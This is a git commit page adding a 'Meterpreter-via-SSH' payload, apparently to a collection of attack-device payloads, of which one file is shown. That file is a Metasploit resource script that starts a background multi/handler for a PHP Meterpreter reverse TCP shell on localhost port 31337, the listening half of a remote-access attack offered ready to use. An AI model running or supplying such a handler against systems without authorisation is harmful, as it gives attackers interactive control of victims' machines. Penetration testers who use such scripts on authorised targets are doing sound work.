added Meterpreter-via-SSH payload (#27)

This commit is contained in:
Zappus
2017-12-26 23:53:25 -05:00
committed by Sebastian Kinne
parent 06479075e0
commit 261fb62b10
3 changed files with 133 additions and 0 deletions

View File

@@ -0,0 +1,9 @@
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set EnableContextEncoding false
set DisablePayloadHandler false
set ExitOnSession false
set ListenerTimeout 0
set LHOST 127.0.0.1
set LPORT 31337
run -j